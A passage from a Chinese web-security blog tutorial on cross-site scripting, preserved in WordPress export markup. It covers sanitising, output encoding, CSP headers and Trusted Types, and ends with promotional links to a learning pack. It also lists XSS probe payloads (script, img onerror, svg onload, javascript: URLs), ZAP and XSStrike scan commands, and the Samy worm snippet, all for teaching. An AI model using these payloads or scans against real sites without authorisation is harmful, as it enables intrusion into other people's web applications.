punctuation\">]<\/span><br \/>\n  <span class=\"token punctuation\">}<\/span><span class=\"token punctuation\">;<\/span><\/p>\n<p>  <span class=\"token comment\">\/\/ \u4f7f\u7528DOMPurify\u7b49\u5e93<\/span><br \/>\n  <span class=\"token 
keyword\">return<\/span> DOMPurify<span class=\"token punctuation\">.<\/span><span class=\"token function\">sanitize<\/span><span class=\"token punctuation\">(<\/span>str<span class=\"token punctuation\">,<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n    <span class=\"token constant\">ALLOWED_TAGS<\/span><span class=\"token operator\">:<\/span> Object<span class=\"token punctuation\">.<\/span><span class=\"token function\">keys<\/span><span class=\"token punctuation\">(<\/span>allowedTags<span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">,<\/span><br \/>\n    <span class=\"token constant\">ALLOWED_ATTR<\/span><span class=\"token operator\">:<\/span> <span class=\"token punctuation\">[<\/span><span class=\"token punctuation\">]<\/span><br \/>\n  <span class=\"token punctuation\">}<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\n<span class=\"token punctuation\">}<\/span><\/p>\n<h4>7.2 \u8f93\u51fa\u7f16\u7801<\/h4>\n<table>\n<thead>\n<tr>\n<th>\u4e0a\u4e0b\u6587<\/th>\n<th>\u7f16\u7801\u65b9\u5f0f<\/th>\n<th>\u793a\u4f8b<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>HTML\u5185\u5bb9<\/td>\n<td>HTML\u5b9e\u4f53\u7f16\u7801<\/td>\n<td>&amp;lt;script&amp;gt;<\/td>\n<\/tr>\n<tr>\n<td>HTML\u5c5e\u6027<\/td>\n<td>HTML\u5c5e\u6027\u7f16\u7801<\/td>\n<td>&amp;quot;alert(1)&amp;quot;<\/td>\n<\/tr>\n<tr>\n<td>JavaScript<\/td>\n<td>JavaScript Unicode\u7f16\u7801<\/td>\n<td>\\\\u003Cscript\\\\u003E<\/td>\n<\/tr>\n<tr>\n<td>URL\u53c2\u6570<\/td>\n<td>URL\u7f16\u7801<\/td>\n<td>%3Cscript%3E<\/td>\n<\/tr>\n<tr>\n<td>CSS<\/td>\n<td>CSS\u7f16\u7801<\/td>\n<td>\\\\3Cscript\\\\3E<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>7.3 \u5185\u5bb9\u5b89\u5168\u7b56\u7565&#xff08;CSP&#xff09;<\/h4>\n<p># \u4e25\u683c\u7684CSP\u5934&#xff08;script-src \u672a\u4f7f\u7528 &#039;unsafe-inline&#039;&#xff1b;style-src \u4ecd\u5141\u8bb8\u5185\u8054\u6837\u5f0f&#xff0c;\u53ef\u6539\u7528 nonce \u6216 hash \u6536\u7d27&#xff09;<br \/>\nContent-Security-Policy:<br \/>\n  default-src &#039;none&#039;;<br \/>\n  script-src &#039;self&#039; https:\/\/trusted-cdn.com;<br \/>\n  style-src &#039;self&#039; &#039;unsafe-inline&#039;;<br \/>\n  img-src 
&#039;self&#039; data:;<br \/>\n  connect-src &#039;self&#039;;<br \/>\n  font-src &#039;self&#039;;<br \/>\n  object-src &#039;none&#039;;<br \/>\n  frame-ancestors &#039;none&#039;;<br \/>\n  base-uri &#039;self&#039;;<br \/>\n  form-action &#039;self&#039;;<\/p>\n<h4>7.4 \u5176\u4ed6\u5b89\u5168\u63aa\u65bd<\/h4>\n<p><span class=\"token comment\">\/\/ 1. HttpOnly Cookie<\/span><br \/>\nSet<span class=\"token operator\">-<\/span>Cookie<span class=\"token operator\">:<\/span> sessionId<span class=\"token operator\">&#061;<\/span>abc123<span class=\"token punctuation\">;<\/span> HttpOnly<span class=\"token punctuation\">;<\/span> Secure<\/p>\n<p><span class=\"token comment\">\/\/ 2. \u8f93\u5165\u957f\u5ea6\u9650\u5236&#xff08;maxlength \u4ec5\u4e3a\u5ba2\u6237\u7aef\u9650\u5236&#xff0c;\u670d\u52a1\u5668\u7aef\u4ecd\u9700\u6821\u9a8c&#xff09;<\/span><br \/>\n<span class=\"token operator\">&lt;<\/span>input maxlength<span class=\"token operator\">&#061;<\/span><span class=\"token string\">&#034;100&#034;<\/span><span class=\"token operator\">&gt;<\/span><\/p>\n<p><span class=\"token comment\">\/\/ 3. \u6846\u67b6\u5b89\u5168\u8bbe\u7f6e<\/span><br \/>\n<span class=\"token comment\">\/\/ X-Frame-Options: DENY<\/span><br \/>\n<span class=\"token comment\">\/\/ X-Content-Type-Options: nosniff<\/span><\/p>\n<h3>8. 
\u68c0\u6d4b\u4e0e\u6d4b\u8bd5<\/h3>\n<h4>8.1 \u624b\u52a8\u6d4b\u8bd5\u5411\u91cf<\/h4>\n<p><span class=\"token comment\">\/\/ \u57fa\u7840\u6d4b\u8bd5payload<\/span><br \/>\n<span class=\"token operator\">&lt;<\/span>script<span class=\"token operator\">&gt;<\/span><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><span class=\"token operator\">&lt;<\/span><span class=\"token operator\">\/<\/span>script<span class=\"token operator\">&gt;<\/span><br \/>\n<span class=\"token operator\">&lt;<\/span>img src<span class=\"token operator\">&#061;<\/span>x onerror<span class=\"token operator\">&#061;<\/span><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><span class=\"token operator\">&gt;<\/span><br \/>\n&#034;<span class=\"token operator\">&gt;<\/span><span class=\"token operator\">&lt;<\/span>script<span class=\"token operator\">&gt;<\/span><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><span class=\"token operator\">&lt;<\/span><span class=\"token operator\">\/<\/span>script<span class=\"token operator\">&gt;<\/span><br \/>\n<span class=\"token literal-property property\">javascript<\/span><span class=\"token operator\">:<\/span><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><\/p>\n<p><span class=\"token comment\">\/\/ \u9ad8\u7ea7\u6d4b\u8bd5payload<\/span><br \/>\n<span class=\"token operator\">&lt;<\/span>svg onload<span class=\"token operator\">&#061;<\/span><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span 
class=\"token punctuation\">)<\/span><span class=\"token operator\">&gt;<\/span><br \/>\n<span class=\"token operator\">&lt;<\/span>iframe src<span class=\"token operator\">&#061;<\/span><span class=\"token string\">&#034;javascript:alert(1)&#034;<\/span><span class=\"token operator\">&gt;<\/span><\/p>\n<h4>8.2 \u81ea\u52a8\u5316\u626b\u63cf<\/h4>\n<p><span class=\"token comment\"># \u4f7f\u7528\u5de5\u5177<\/span><br \/>\n<span class=\"token comment\"># OWASP ZAP<\/span><br \/>\nzap-cli quick-scan &#8211;self-contained http:\/\/target.com<\/p>\n<p><span class=\"token comment\"># XSStrike<\/span><br \/>\npython xsstrike.py -u <span class=\"token string\">&#034;http:\/\/target.com\/search?q&#061;test&#034;<\/span><\/p>\n<p><span class=\"token comment\"># \u81ea\u5b9a\u4e49\u68c0\u6d4b\u811a\u672c<\/span><\/p>\n<h4>8.3 \u6d4f\u89c8\u5668\u5b89\u5168\u7279\u6027<\/h4>\n<p><span class=\"token comment\">\/\/ Trusted Types API<\/span><br \/>\n<span class=\"token keyword\">if<\/span> <span class=\"token punctuation\">(<\/span>window<span class=\"token punctuation\">.<\/span>trustedTypes <span class=\"token operator\">&amp;&amp;<\/span> window<span class=\"token punctuation\">.<\/span>trustedTypes<span class=\"token punctuation\">.<\/span>createPolicy<span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n  <span class=\"token keyword\">const<\/span> policy <span class=\"token operator\">&#061;<\/span> trustedTypes<span class=\"token punctuation\">.<\/span><span class=\"token function\">createPolicy<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;default&#039;<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n    <span class=\"token function-variable function\">createHTML<\/span><span class=\"token operator\">:<\/span> <span class=\"token punctuation\">(<\/span><span class=\"token parameter\">string<\/span><span class=\"token 
punctuation\">)<\/span> <span class=\"token operator\">&#061;&gt;<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n      <span class=\"token comment\">\/\/ \u81ea\u5b9a\u4e49\u6e05\u7406\u903b\u8f91&#xff08;\u4ec5\u5f53\u54cd\u5e94\u5e26\u6709 CSP \u5934 require-trusted-types-for &#039;script&#039; \u65f6&#xff0c;\u6d4f\u89c8\u5668\u624d\u4f1a\u5f3a\u5236\u4f7f\u7528\u8be5\u7b56\u7565&#xff09;<\/span><br \/>\n      <span class=\"token keyword\">return<\/span> <span class=\"token function\">sanitizeHTML<\/span><span class=\"token punctuation\">(<\/span>string<span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\n    <span class=\"token punctuation\">}<\/span><br \/>\n  <span class=\"token punctuation\">}<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\n<span class=\"token punctuation\">}<\/span><\/p>\n<h3>9. \u771f\u5b9e\u6848\u4f8b\u5206\u6790<\/h3>\n<h4>\u6848\u4f8b1&#xff1a;\u793e\u4ea4\u5a92\u4f53XSS\u8815\u866b<\/h4>\n<p><span class=\"token comment\">\/\/ \u8457\u540d\u7684Samy\u8815\u866b&#xff08;MySpace&#xff0c;2005&#xff09;<\/span><br \/>\n<span class=\"token comment\">\/\/ \u901a\u8fc7\u4e2a\u4eba\u8d44\u6599\u9875\u9762\u4f20\u64ad<\/span><br \/>\n<span class=\"token comment\">\/\/ \u611f\u67d3\u8d85\u8fc7100\u4e07\u7528\u6237<\/span><br \/>\n<span class=\"token comment\">\/\/ \u5173\u952e\u4ee3\u7801&#xff1a;<\/span><br \/>\n<span class=\"token operator\">&lt;<\/span>div id<span class=\"token operator\">&#061;<\/span>mycode style<span class=\"token operator\">&#061;<\/span>&#034;<span class=\"token constant\">BACKGROUND<\/span><span class=\"token operator\">:<\/span> <span class=\"token function\">url<\/span><span class=\"token punctuation\">(<\/span>&#039;java<br \/>\n<span class=\"token literal-property property\">script<\/span><span class=\"token operator\">:<\/span><span class=\"token function\">eval<\/span><span class=\"token punctuation\">(<\/span>document<span class=\"token punctuation\">.<\/span>all<span class=\"token punctuation\">.<\/span>mycode<span class=\"token punctuation\">.<\/span>expr<span class=\"token punctuation\">)<\/span><span 
class=\"token string\">&#039;)&#034; expr&#061;&#034;alert(&#039;<\/span><span class=\"token constant\">XSS<\/span>&#039;<span class=\"token punctuation\">)<\/span>&#034; <span class=\"token operator\">\/<\/span><span class=\"token operator\">&gt;<\/span><\/p>\n<h4>\u6848\u4f8b2&#xff1a;DOM XSS in jQuery<\/h4>\n<p><span class=\"token comment\">\/\/ CVE-2020-11022\/11023<\/span><br \/>\n<span class=\"token comment\">\/\/ \u6f0f\u6d1e\u4ee3\u7801&#xff1a;<\/span><br \/>\n<span class=\"token function\">$<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;&lt;div&gt;&#039;<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">.<\/span><span class=\"token function\">html<\/span><span class=\"token punctuation\">(<\/span>userInput<span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><\/p>\n<p><span class=\"token comment\">\/\/ \u4fee\u590d&#xff1a;\u5347\u7ea7 jQuery \u81f3 3.5.0 \u53ca\u4ee5\u4e0a\u4fee\u8865\u8be5 CVE&#xff0c;\u5bf9\u4e0d\u53ef\u4fe1\u8f93\u5165\u4f7f\u7528 .text() \u800c\u975e .html()<\/span><br \/>\n<span class=\"token function\">$<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;&lt;div&gt;&#039;<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">.<\/span><span class=\"token function\">text<\/span><span class=\"token punctuation\">(<\/span>userInput<span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><\/p>\n<h3>10. \u53d1\u5c55\u8d8b\u52bf\u4e0e\u672a\u6765\u6311\u6218<\/h3>\n<h4>10.1 \u65b0\u5174\u5a01\u80c1<\/h4>\n<ul>\n<li>WebAssembly\u4e2d\u7684XSS&#xff1a;\u901a\u8fc7Wasm\u6a21\u5757\u7ed5\u8fc7\u4f20\u7edf\u68c0\u6d4b<\/li>\n<li>Shadow DOM XSS&#xff1a;Web\u7ec4\u4ef6\u4e2d\u7684\u9694\u79bb\u95ee\u9898<\/li>\n<li>\u673a\u5668\u5b66\u4e60\u6a21\u578b\u6295\u6bd2&#xff1a;\u95f4\u63a5\u5bfc\u81f4XSS\u6f0f\u6d1e<\/li>\n<\/ul>\n<h4>10.2 \u9632\u5fa1\u6f14\u8fdb<\/h4>\n<p><span class=\"token comment\">\/\/ \u73b0\u4ee3\u9632\u5fa1\u6280\u672f<\/span><br \/>\n<span class=\"token comment\">\/\/ 1. 
Subresource Integrity (SRI)<\/span><br \/>\n<span class=\"token operator\">&lt;<\/span>script src<span class=\"token operator\">&#061;<\/span><span class=\"token string\">&#034;https:\/\/cdn.example.com\/script.js&#034;<\/span><br \/>\n        integrity<span class=\"token operator\">&#061;<\/span><span class=\"token string\">&#034;sha384-oqVuAfXRKap7fdgcCY5uykM6&#043;R9GqQ8K\/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC&#034;<\/span><br \/>\n        crossorigin<span class=\"token operator\">&#061;<\/span><span class=\"token string\">&#034;anonymous&#034;<\/span><span class=\"token operator\">&gt;<\/span><span class=\"token operator\">&lt;<\/span><span class=\"token operator\">\/<\/span>script<span class=\"token operator\">&gt;<\/span><\/p>\n<p><span class=\"token comment\">\/\/ 2. Cross-Origin Resource Policy&#xff08;\u9650\u5236\u8de8\u7ad9\u8bfb\u53d6\u8d44\u6e90&#xff0c;\u5c5e\u4e8e\u8d44\u6e90\u9694\u79bb\u63aa\u65bd&#xff0c;\u4e0d\u76f4\u63a5\u963b\u6b62\u811a\u672c\u6ce8\u5165&#xff09;<\/span><br \/>\nCross<span class=\"token operator\">&#8211;<\/span>Origin<span class=\"token operator\">&#8211;<\/span>Resource<span class=\"token operator\">&#8211;<\/span>Policy<span class=\"token operator\">:<\/span> same<span class=\"token operator\">&#8211;<\/span>site<\/p>\n<p><span class=\"token comment\">\/\/ 3. 
Fetch Metadata<\/span><br \/>\nSec<span class=\"token operator\">&#8211;<\/span>Fetch<span class=\"token operator\">&#8211;<\/span>Site<span class=\"token operator\">:<\/span> cross<span class=\"token operator\">&#8211;<\/span>site<br \/>\nSec<span class=\"token operator\">&#8211;<\/span>Fetch<span class=\"token operator\">&#8211;<\/span>Mode<span class=\"token operator\">:<\/span> navigate<\/p>\n<h3>\u603b\u7ed3<\/h3>\n<p>XSS\u653b\u51fb\u4ecd\u7136\u662fWeb\u5b89\u5168\u4e2d\u6700\u666e\u904d\u4e14\u5371\u9669\u7684\u5a01\u80c1\u4e4b\u4e00\u3002\u968f\u7740Web\u6280\u672f\u7684\u53d1\u5c55&#xff0c;\u65b0\u7684\u653b\u51fb\u5411\u91cf\u4e0d\u65ad\u51fa\u73b0\u3002\u6709\u6548\u7684XSS\u9632\u5fa1\u9700\u8981&#xff1a;<\/p>\n<li>\u591a\u5c42\u9632\u5fa1\u7b56\u7565&#xff1a;\u8f93\u5165\u9a8c\u8bc1\u3001\u8f93\u51fa\u7f16\u7801\u3001CSP\u7b49\u591a\u91cd\u4fdd\u62a4<\/li>\n<li>\u5b89\u5168\u5f00\u53d1\u5b9e\u8df5&#xff1a;\u5728SDLC\u4e2d\u96c6\u6210\u5b89\u5168\u6d4b\u8bd5<\/li>\n<li>\u6301\u7eed\u76d1\u63a7&#xff1a;\u5b9e\u65f6\u68c0\u6d4b\u548c\u54cd\u5e94XSS\u653b\u51fb<\/li>\n<li>\u5b89\u5168\u610f\u8bc6&#xff1a;\u5bf9\u5f00\u53d1\u8005\u548c\u7528\u6237\u8fdb\u884c\u5b89\u5168\u6559\u80b2<\/li>\n<li>\u6df1\u5ea6\u9632\u5fa1&#xff1a;\u7ed3\u5408\u5176\u4ed6\u5b89\u5168\u63aa\u65bd&#xff08;WAF\u3001RASP\u7b49&#xff09;<\/li>\n<p>\u9632\u5fa1XSS\u4e0d\u4ec5\u662f\u6280\u672f\u6311\u6218&#xff0c;\u66f4\u662f\u6301\u7eed\u7684\u8fc7\u7a0b&#xff0c;\u9700\u8981\u5f00\u53d1\u56e2\u961f\u3001\u5b89\u5168\u56e2\u961f\u548c\u8fd0\u7ef4\u56e2\u961f\u7684\u5171\u540c\u534f\u4f5c\u3002\u968f\u7740Web\u6280\u672f\u7684\u6f14\u8fdb&#xff0c;XSS\u9632\u62a4\u4e5f\u9700\u8981\u4e0d\u65ad\u66f4\u65b0\u548c\u6539\u8fdb\u3002<\/p>\n<h4>\u7f51\u7edc\u5b89\u5168\u5b66\u4e60\u8d44\u6e90\u5206\u4eab:<\/h4>\n<p>\u7ed9\u5927\u5bb6\u5206\u4eab\u4e00\u4efd\u5168\u5957\u7684\u7f51\u7edc\u5b89\u5168\u5b66\u4e60\u8d44\u6599&#xff0c;\u7ed9\u90a3\u4e9b\u60f3\u5b66\u4e60 
\u7f51\u7edc\u5b89\u5168\u7684\u5c0f\u4f19\u4f34\u4eec\u4e00\u70b9\u5e2e\u52a9&#xff01;<\/p>\n<p>\u5bf9\u4e8e\u4ece\u6765\u6ca1\u6709\u63a5\u89e6\u8fc7\u7f51\u7edc\u5b89\u5168\u7684\u540c\u5b66&#xff0c;\u6211\u4eec\u5e2e\u4f60\u51c6\u5907\u4e86\u8be6\u7ec6\u7684\u5b66\u4e60\u6210\u957f\u8def\u7ebf\u56fe\u3002\u53ef\u4ee5\u8bf4\u662f\u6700\u79d1\u5b66\u6700\u7cfb\u7edf\u7684\u5b66\u4e60\u8def\u7ebf&#xff0c;\u5927\u5bb6\u8ddf\u7740\u8fd9\u4e2a\u5927\u7684\u65b9\u5411\u5b66\u4e60\u51c6\u6ca1\u95ee\u9898\u3002<\/p>\n<h6>&#x1f449;1.\u6210\u957f\u8def\u7ebf\u56fe&amp;\u5b66\u4e60\u89c4\u5212&#x1f448;<\/h6>\n<p>\u8981\u5b66\u4e60\u4e00\u95e8\u65b0\u7684\u6280\u672f&#xff0c;\u4f5c\u4e3a\u65b0\u624b\u4e00\u5b9a\u8981\u5148\u5b66\u4e60\u6210\u957f\u8def\u7ebf\u56fe&#xff0c;\u65b9\u5411\u4e0d\u5bf9&#xff0c;\u52aa\u529b\u767d\u8d39\u3002<\/p>\n<p>\u5bf9\u4e8e\u4ece\u6765\u6ca1\u6709\u63a5\u89e6\u8fc7\u7f51\u7edc\u5b89\u5168\u7684\u540c\u5b66&#xff0c;\u6211\u4eec\u5e2e\u4f60\u51c6\u5907\u4e86\u8be6\u7ec6\u7684\u5b66\u4e60\u6210\u957f\u8def\u7ebf\u56fe&amp;\u5b66\u4e60\u89c4\u5212\u3002\u53ef\u4ee5\u8bf4\u662f\u6700\u79d1\u5b66\u6700\u7cfb\u7edf\u7684\u5b66\u4e60\u8def\u7ebf&#xff0c;\u5927\u5bb6\u8ddf\u7740\u8fd9\u4e2a\u5927\u7684\u65b9\u5411\u5b66\u4e60\u51c6\u6ca1\u95ee\u9898\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061729-697706f9e43b5.webp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/> <img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061729-697706f9ee5ca.webp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" 
\/><\/p>\n<h6>&#x1f449;2.\u7f51\u5b89\u5165\u95e8\u5230\u8fdb\u9636\u89c6\u9891\u6559\u7a0b&#x1f448;<\/h6>\n<p>\u5f88\u591a\u670b\u53cb\u90fd\u4e0d\u559c\u6b22\u6666\u6da9\u7684\u6587\u5b57&#xff0c;\u6211\u4e5f\u4e3a\u5927\u5bb6\u51c6\u5907\u4e86\u89c6\u9891\u6559\u7a0b&#xff0c;\u5176\u4e2d\u4e00\u5171\u670921\u4e2a\u7ae0\u8282&#xff0c;\u6bcf\u4e2a\u7ae0\u8282\u90fd\u662f\u5f53\u524d\u677f\u5757\u7684\u7cbe\u534e\u6d53\u7f29\u3002****&#xff08;\u5168\u5957\u6559\u7a0b\u6587\u672b\u9886\u53d6\u54c8&#xff09; <img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061730-697706fa04362.webp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061730-697706fa0de6a.webp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<h6>&#x1f449;3.SRC&amp;\u9ed1\u5ba2\u6587\u6863&#x1f448;<\/h6>\n<p>\u5927\u5bb6\u6700\u559c\u6b22\u4e5f\u662f\u6700\u5173\u5fc3\u7684SRC\u6280\u672f\u6587\u7c4d&amp;\u9ed1\u5ba2\u6280\u672f\u4e5f\u6709\u6536\u5f55<\/p>\n<p>SRC\u6280\u672f\u6587\u7c4d&#xff1a;<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061730-697706fa174da.webp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<p>\u9ed1\u5ba2\u8d44\u6599\u7531\u4e8e\u662f\u654f\u611f\u8d44\u6e90&#xff0c;\u8fd9\u91cc\u4e0d\u80fd\u76f4\u63a5\u5c55\u793a\u54e6&#xff01;****&#xff08;\u5168\u5957\u6559\u7a0b\u6587\u672b\u9886\u53d6\u54c8&#xff09;<\/p>\n<h6>&#x1f449;4.\u62a4\u7f51\u884c\u52a8\u8d44\u6599&#x1f448;<\/h6>\n<p>\u5176\u4e2d\u5173\u4e8eHW\u62a4\u7f51\u884c\u52a8&#xff0c;\u4e5f\u51c6\u5907\u4e86\u5bf9\u5e94\u7684\u8d44\u6599&#xff0c;\u8fd9\u4e9b\u5185\u5bb9\u53ef\u76f8\u5f53\u4e8e\u6bd4\u8d5b\u7684\u91d1\u624b\u6307&#xff01;<\/p>\n<p><img decoding=\"async\" 
src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061730-697706fa209ff.webp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<h6>&#x1f449;5.\u9ed1\u5ba2\u5fc5\u8bfb\u4e66\u5355&#x1f448;<\/h6>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061730-697706fa29d13.webp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<h6>&#x1f449;6.\u7f51\u7edc\u5b89\u5168\u5c97\u9762\u8bd5\u9898\u5408\u96c6&#x1f448;<\/h6>\n<p>\u5f53\u4f60\u81ea\u5b66\u5230\u8fd9\u91cc&#xff0c;\u4f60\u5c31\u8981\u5f00\u59cb\u601d\u8003\u627e\u5de5\u4f5c\u7684\u4e8b\u60c5\u4e86&#xff0c;\u800c\u5de5\u4f5c\u7ed5\u4e0d\u5f00\u7684\u5c31\u662f\u771f\u9898\u548c\u9762\u8bd5\u9898\u3002 <img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061730-697706fa33042.webp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/> \u6240\u6709\u8d44\u6599\u5171282G&#xff0c;\u670b\u53cb\u4eec\u5982\u679c\u6709\u9700\u8981\u5168\u5957\u300a\u7f51\u7edc\u5b89\u5168\u5165\u95e8&#043;\u8fdb\u9636\u5b66\u4e60\u8d44\u6e90\u5305\u300b&#xff0c;\u53ef\u4ee5\u626b\u63cf\u4e0b\u65b9\u4e8c\u7ef4\u7801\u6216\u94fe\u63a5\u514d\u8d39\u9886\u53d6~<\/p>\n<p>**\u8bfb\u8005\u798f\u5229 |** CSDN\u5927\u793c\u5305&#xff1a;\u300a\u7f51\u7edc\u5b89\u5168\u5165\u95e8&amp;\u8fdb\u9636\u5b66\u4e60\u8d44\u6e90\u5305\u300b\u514d\u8d39\u5206\u4eab **&#xff08;\u5b89\u5168\u94fe\u63a5&#xff0c;\u653e\u5fc3\u70b9\u51fb&#xff09;**<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061730-697706fa3c4e8.jpg\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>XSS\u653b\u51fb\u8be6\u89e3<br \/>\n1. 
XSS\u653b\u51fb\u6982\u8ff0<br \/>\nXSS&#xff08;Cross-Site Scripting&#xff0c;\u8de8\u7ad9\u811a\u672c\u653b\u51fb&#xff09; \u662f\u4e00\u79cd\u5c06\u6076\u610f\u811a\u672c\u6ce8\u5165\u5230\u53ef\u4fe1\u7f51\u7ad9\u4e2d\u7684\u5b89\u5168\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u901a\u8fc7\u5728Web\u9875\u9762\u4e2d\u63d2\u5165\u6076\u610f\u811a\u672c&#xff0c;\u5f53\u5176\u4ed6\u7528\u6237\u6d4f\u89c8\u8be5\u9875\u9762\u65f6&#xff0c;\u811a\u672c\u4f1a\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u6267\u884c\u3002<br \/>\n\u5173\u952e\u7279\u5f81&#xff1a;<br \/>\n\u653b\u51fb\u53d1\u751f\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u5229\u7528\u7f51\u7ad9\u5bf9\u7528\u6237\u8f93\u5165\u7684\u4fe1\u4efb\u7ed5\u8fc7\u540c\u6e90\u7b56\u7565&#xff08;SOP&#xff09;\u7684\u9650\u5236\u5f71\u54cd\u8303\u56f4\u5e7f\u6cdb&#xff1a;\u7a83\u53d6Co<\/p>\n","protected":false},"author":2,"featured_media":66257,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[7003,275,1042,122],"topic":[],"class_list":{"0":"post-66258","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","6":"hentry","7":"category-server","8":"tag-xss","9":"tag-web","11":"tag-122"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Web\u5b89\u5168\u5fc5\u77e5\uff5cXSS\u653b\u51fb\u8be6\u89e3\uff1a\u4ece\u6f0f\u6d1e\u6316\u6398\u5230\u9632\u62a4\u5b9e\u6218\uff0c\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.wsisp.com\/helps\/66258.html\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" 
content=\"Web\u5b89\u5168\u5fc5\u77e5\uff5cXSS\u653b\u51fb\u8be6\u89e3\uff1a\u4ece\u6f0f\u6d1e\u6316\u6398\u5230\u9632\u62a4\u5b9e\u6218\uff0c\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"og:description\" content=\"XSS\u653b\u51fb\u8be6\u89e3 1. XSS\u653b\u51fb\u6982\u8ff0 XSS&#xff08;Cross-Site Scripting&#xff0c;\u8de8\u7ad9\u811a\u672c\u653b\u51fb&#xff09; \u662f\u4e00\u79cd\u5c06\u6076\u610f\u811a\u672c\u6ce8\u5165\u5230\u53ef\u4fe1\u7f51\u7ad9\u4e2d\u7684\u5b89\u5168\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u901a\u8fc7\u5728Web\u9875\u9762\u4e2d\u63d2\u5165\u6076\u610f\u811a\u672c&#xff0c;\u5f53\u5176\u4ed6\u7528\u6237\u6d4f\u89c8\u8be5\u9875\u9762\u65f6&#xff0c;\u811a\u672c\u4f1a\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u6267\u884c\u3002 \u5173\u952e\u7279\u5f81&#xff1a; \u653b\u51fb\u53d1\u751f\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u5229\u7528\u7f51\u7ad9\u5bf9\u7528\u6237\u8f93\u5165\u7684\u4fe1\u4efb\u7ed5\u8fc7\u540c\u6e90\u7b56\u7565&#xff08;SOP&#xff09;\u7684\u9650\u5236\u5f71\u54cd\u8303\u56f4\u5e7f\u6cdb&#xff1a;\u7a83\u53d6Co\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.wsisp.com\/helps\/66258.html\" \/>\n<meta 